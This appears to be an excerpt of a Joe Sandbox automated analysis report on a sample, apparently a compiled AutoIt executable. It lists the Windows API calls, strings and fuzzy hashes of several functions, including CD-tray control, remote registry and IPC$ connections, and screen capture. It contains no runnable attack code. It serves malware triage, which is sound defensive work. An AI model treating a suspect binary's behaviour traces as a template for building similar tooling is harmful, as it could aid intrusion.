                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00379CA0
                                                                          • __swprintf.LIBCMT ref: 00379CF9
                                                                          • __swprintf.LIBCMT ref: 00379D12
                                                                          • _wprintf.LIBCMT ref: 00379DB9
                                                                          • _wprintf.LIBCMT ref: 00379DD7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 311963372-3080491070
                                                                          • Opcode ID: 4b6f60d398f07addc94924666b06198dc2f72963b02a83c741e797b9587dfa37
                                                                          • Instruction ID: ff17e799d9d737d44160e254eb9c70deb75ac8de7863bd496d5493ebb02da500
                                                                          • Opcode Fuzzy Hash: 4b6f60d398f07addc94924666b06198dc2f72963b02a83c741e797b9587dfa37
                                                                          • Instruction Fuzzy Hash: ED519632900509AECF1BEBE0DD46EEEB778AF08300F144566F509B6061EB352F99CB51
                                                                          APIs
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0037A3CB
                                                                          • GetDriveTypeW.KERNEL32 ref: 0037A418
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037A460
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037A497
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037A4C5
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 2698844021-4113822522
                                                                          • Opcode ID: bf9e61198b8f39abd156ea9f30534f645094dd9d17779ea6163d8c5f80d1f820
                                                                          • Instruction ID: b0152edbfca48d0632e69ddc58e3c85c3d3b7dbc5970b91a5cf11a61d31b759b
                                                                          • Opcode Fuzzy Hash: bf9e61198b8f39abd156ea9f30534f645094dd9d17779ea6163d8c5f80d1f820
                                                                          • Instruction Fuzzy Hash: 29514E751086059FC716EF11C891DAEB3F8EF88718F04885DF8999B261DB31EE45CB52
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0034E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0036F8DF
                                                                          • LoadStringW.USER32(00000000,?,0034E029,00000001), ref: 0036F8E8
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0034E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0036F90A
                                                                          • LoadStringW.USER32(00000000,?,0034E029,00000001), ref: 0036F90D
                                                                          • __swprintf.LIBCMT ref: 0036F95D
                                                                          • __swprintf.LIBCMT ref: 0036F96E
                                                                          • _wprintf.LIBCMT ref: 0036FA17
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0036FA2E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                          • API String ID: 984253442-2268648507
                                                                          • Opcode ID: 32c99c99fb14b21e9dae043c466a0f35df4a433053f0c92f5a1c4031c3b7acbc
                                                                          • Instruction ID: a6a2d2366a5d33605cdaeb1513cf8934bc4f20a6babf25c0b9aafd91f11b0ffc
                                                                          • Opcode Fuzzy Hash: 32c99c99fb14b21e9dae043c466a0f35df4a433053f0c92f5a1c4031c3b7acbc
                                                                          • Instruction Fuzzy Hash: 1D41217280410DAACB0AFBE0DD86DEE777CAF58300F144465F505BA095EB316F59CB61
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0039BA56
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0039BA6D
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0039BA78
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0039BA85
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0039BA8E
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0039BA9D
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0039BAA6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0039BAAD
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0039BABE
                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,003A2CAC,?), ref: 0039BAD7
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0039BAE7
                                                                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 0039BB0B
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0039BB36
                                                                          • DeleteObject.GDI32(00000000), ref: 0039BB5E
                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0039BB74
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3840717409-0
                                                                          • Opcode ID: f58222d46f3f80320c006916ba0810d512036132520e239f8633fdd12ff90f8f
                                                                          • Instruction ID: 244aec58f916168e203c0aa51d2b149317953ad4b5cfc12d4b1cadc4c7a2d5b0
                                                                          • Opcode Fuzzy Hash: f58222d46f3f80320c006916ba0810d512036132520e239f8633fdd12ff90f8f
                                                                          • Instruction Fuzzy Hash: E4412775600208EFDB129F65ED88EAABBBDFF89711F104069F949D72A0D7719E01CB60
                                                                          APIs
                                                                          • __wsplitpath.LIBCMT ref: 0037DA10
                                                                          • _wcscat.LIBCMT ref: 0037DA28
                                                                          • _wcscat.LIBCMT ref: 0037DA3A
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0037DA4F
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DA63
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0037DA7B
                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 0037DA95
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DAA7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                          • String ID: *.*
                                                                          • API String ID: 34673085-438819550
                                                                          • Opcode ID: 8f1d92521ce38e12c567ec8e2324945d8166c3c0bd7179400322150447e2a4a9
• Instruction ID: 84a732300028c7788752e338d13582966379bc8b98ebf5226c9473ce0e25705e
• Opcode Fuzzy Hash: 8f1d92521ce38e12c567ec8e2324945d8166c3c0bd7179400322150447e2a4a9
• Instruction Fuzzy Hash: DD8173715042419FCB75DF64C844AAAB7F8BF8A310F19882EF98DCB251D738D945CB52
APIs
  • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0039C1FC
• GetFocus.USER32 ref: 0039C20C
• GetDlgCtrlID.USER32(00000000), ref: 0039C217
• _memset.LIBCMT ref: 0039C342
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0039C36D
• GetMenuItemCount.USER32(?), ref: 0039C38D
• GetMenuItemID.USER32(?,00000000), ref: 0039C3A0
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0039C3D4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0039C41C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0039C454
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0039C489
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: bcc44602a42579d6dcdc674e7fdd08a81324c7dbd57902a9c520621e2c4a2579
• Instruction ID: 9ab330ff3be03647a0f4bab7aad6fec88be41ee284102ac43a940bfe3712b7b0
• Opcode Fuzzy Hash: bcc44602a42579d6dcdc674e7fdd08a81324c7dbd57902a9c520621e2c4a2579
• Instruction Fuzzy Hash: 5981A971218301AFDB13DF25D894AABBBE8FB88314F11592EF99597291C731D904CBA2
APIs
• GetDC.USER32(00000000), ref: 0038738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0038739B
• CreateCompatibleDC.GDI32(?), ref: 003873A7
• SelectObject.GDI32(00000000,?), ref: 003873B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00387408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00387444
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00387468
• SelectObject.GDI32(00000006,?), ref: 00387470
• DeleteObject.GDI32(?), ref: 00387479
• DeleteDC.GDI32(00000006), ref: 00387480
• ReleaseDC.USER32(00000000,?), ref: 0038748B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 8018eee83a69c43afdde6644060d10c74c7a4b458d30441a58d0ee7437579a04
• Instruction ID: 1fcff1c5353d354def59b2f7fbb906dd0ac16f77c5ced25a166e4be427c536ee
• Opcode Fuzzy Hash: 8018eee83a69c43afdde6644060d10c74c7a4b458d30441a58d0ee7437579a04
• Instruction Fuzzy Hash: 3E513875904309EFCB16DFA9CC85EAEBBB9EF48310F24846AF959D7211C771A9408B90
APIs
  • Part of subcall function 00330957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00316B0C,?,00008000), ref: 00330973
  • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00316BAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00316CFA
  • Part of subcall function 0031586D: _wcscpy.LIBCMT ref: 003158A5
  • Part of subcall function 0033363D: _iswctype.LIBCMT ref: 00333645
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-1018226102
• Opcode ID: c5efaca4c9f576fc6c29920f4002f1460e186457e9e3b321593eeb3ab5898040
• Instruction ID: 19afc0205af7cbb66c295e1a54c25d657a91a9613f7e352913c93383179b6782
• Opcode Fuzzy Hash: c5efaca4c9f576fc6c29920f4002f1460e186457e9e3b321593eeb3ab5898040
• Instruction Fuzzy Hash: E1029F311083409FC72AEF24D8919AFBBE5FF99314F14491DF4999B2A1DB30E989CB52
APIs
• _memset.LIBCMT ref: 00372D50
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00372DDD
• GetMenuItemCount.USER32(003D5890), ref: 00372E66
• DeleteMenu.USER32(003D5890,00000005,00000000,000000F5,?,?), ref: 00372EF6
• DeleteMenu.USER32(003D5890,00000004,00000000), ref: 00372EFE
• DeleteMenu.USER32(003D5890,00000006,00000000), ref: 00372F06
• DeleteMenu.USER32(003D5890,00000003,00000000), ref: 00372F0E
• GetMenuItemCount.USER32(003D5890), ref: 00372F16
• SetMenuItemInfoW.USER32(003D5890,00000004,00000000,00000030), ref: 00372F4C
• GetCursorPos.USER32(?), ref: 00372F56
• SetForegroundWindow.USER32(00000000), ref: 00372F5F
• TrackPopupMenuEx.USER32(003D5890,00000000,?,00000000,00000000,00000000), ref: 00372F72
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00372F7E
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
• Opcode ID: 79352a9f5bb025f24aac8dbcae2b95e41539495114f37959bcf4b17e8d8ed234
• Instruction ID: ee3e282fd10a09e4187376f2d0a8ce3b8caab77502629fc91ba37ef38429d0e4
• Opcode Fuzzy Hash: 79352a9f5bb025f24aac8dbcae2b95e41539495114f37959bcf4b17e8d8ed234
• Instruction Fuzzy Hash: BF71A071600205BEEB329F54DC85FABBFA8FB05364F148216F629AA1E1C7795C60DB90
APIs
• VariantInit.OLEAUT32(?), ref: 003888D7
• CoInitialize.OLE32(00000000), ref: 00388904
• CoUninitialize.OLE32 ref: 0038890E
• GetRunningObjectTable.OLE32(00000000,?), ref: 00388A0E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00388B3B
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003A2C0C), ref: 00388B6F
• CoGetObject.OLE32(?,00000000,003A2C0C,?), ref: 00388B92
• SetErrorMode.KERNEL32(00000000), ref: 00388BA5
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00388C25
• VariantClear.OLEAUT32(?), ref: 00388C35
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID: ,,:
• API String ID: 2395222682-824956042
• Opcode ID: 14f0d7d9b7355e33b81177d3a41225efa0e5eaf96ad3657c89e983b1bca0df22
• Instruction ID: 021a610ee548d0bd54fa930f1f286b7df5bb01ae4161771c410b24d5ce5b1f17
• Opcode Fuzzy Hash: 14f0d7d9b7355e33b81177d3a41225efa0e5eaf96ad3657c89e983b1bca0df22
• Instruction Fuzzy Hash: A1C133B1208305AFC706EF28C88496BB7E9FF89348F40495DF98A9B251DB71ED05CB52
APIs
  • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
• _memset.LIBCMT ref: 0036786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003678A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003678BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003678D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00367902
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0036792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00367935
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0036793A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
• Opcode ID: 146cdd2a368bf5f84102107b312873e823e659a98d8f947a3eb859413d716539
• Instruction ID: a7d5884a97dd0ac9c091dc56dbc905c4dce115c1dd63a5d616ea5692e25ed15b
• Opcode Fuzzy Hash: 146cdd2a368bf5f84102107b312873e823e659a98d8f947a3eb859413d716539
• Instruction Fuzzy Hash: 86410972C1422DABCB26EBA4DC85DEEB7B8BF18354F444429F815A7161EB315D44CB90
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038FDAD,?,?), ref: 00390E31
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: 90e32221fed54d4a6decfca740cf206feaf98cac6c428dc4a6914e87268f6053
• Instruction ID: 7df06b82c5d85996b421744b1c813e99f654f55e7985556ad8b7ea4e01b762e5
• Opcode Fuzzy Hash: 90e32221fed54d4a6decfca740cf206feaf98cac6c428dc4a6914e87268f6053
• Instruction Fuzzy Hash: D7415B3650024A8FCF1BEF10E8A5BEF3764AF15340F160459FC565B6A2DB319E5ACBA0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0034E2A0,00000010,?,Bad directive syntax error,0039F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0036F7C2
• LoadStringW.USER32(00000000,?,0034E2A0,00000010), ref: 0036F7C9
  • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
• _wprintf.LIBCMT ref: 0036F7FC
• __swprintf.LIBCMT ref: 0036F81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0036F88D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
• Opcode ID: 604693f7e5ad4b3f985339b8247a7d7075f3cd077f4316705a557ed6283bee6c
• Instruction ID: de264ac0ab2229ceb55d5eb4d5cc2543f69ccb81f35c5672dd12a97a9817c60e
• Opcode Fuzzy Hash: 604693f7e5ad4b3f985339b8247a7d7075f3cd077f4316705a557ed6283bee6c
• Instruction Fuzzy Hash: EB21613290421EEFCF17EF90CC4AEEE7779BF18300F044866F505AA0A1EA319A64DB51
APIs
  • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
  • Part of subcall function 00317924: _memmove.LIBCMT ref: 003179AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00375330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00375346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00375357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00375369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0037537A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: bfdd1695d2fb40c837de19d13260605ec9bc7c1187f50bb8ea03ef830eba1915
• Instruction ID: 2035d951f3d87be780a3a69c6f179a480dd5320d50b2d20abbb7fef0536dacf3
• Opcode Fuzzy Hash: bfdd1695d2fb40c837de19d13260605ec9bc7c1187f50bb8ea03ef830eba1915
• Instruction Fuzzy Hash: 7911983195011979D72AB761CC49EFF7B7CEBD5B44F04081DB415E60E1EEA01D44CAA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
